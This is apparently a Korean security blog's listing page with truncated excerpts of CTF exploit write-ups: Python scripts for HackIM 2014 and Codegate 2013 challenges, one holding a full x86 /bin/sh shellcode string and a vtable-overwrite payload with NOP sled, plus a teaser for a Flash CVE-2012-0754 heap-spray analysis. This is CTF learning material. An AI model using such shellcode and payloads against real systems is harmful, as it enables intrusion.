반응형 blackcon157 [exploit] hackim 2014 exploit 200 import socket import struct ip = "192.168.0.14" port = 6776 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #payload = [strcpy] [pp ret] [freespace] [0xFF] [strcpy] [pp ret] [freespace+1] [0xE4] [freespace] [shellcode] # or [strcpy] [pp ret] [freespace] [0xFFE4] [freespace] [shellcode] strcpy = struct.pack(" 2014. 2. 7. [exploit]codegate 2013 vuln300 #!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = "" payload += "-4\n" payload += "\xe4\x91\x04\x08" payload += "\xe8\x91\x04\x08" payload += "\x90"*0x30 payload += shellcode print payload vtable을 덮어서 쉘코드 호출 2014. 2. 7. [exploit]codegate 2013 vuln200 #!/usr/bin/env python import socket import struct host = '127.0.0.1' port = 7777 p = lambda x: struct.pack(" 2014. 2. 7. Adobe Flash Player 취약점(CVE-2012-0754) 분석 2012년에 등장한 Adobe Flash Player mp4 cprt 취약점을 분석했습니다. Heap Spraying 기법과 같이 작성했으니 도움됐으면 좋겠네요 :D 2014. 1. 24. 이전 1 ··· 24 25 26 27 28 29 30 ··· 40 다음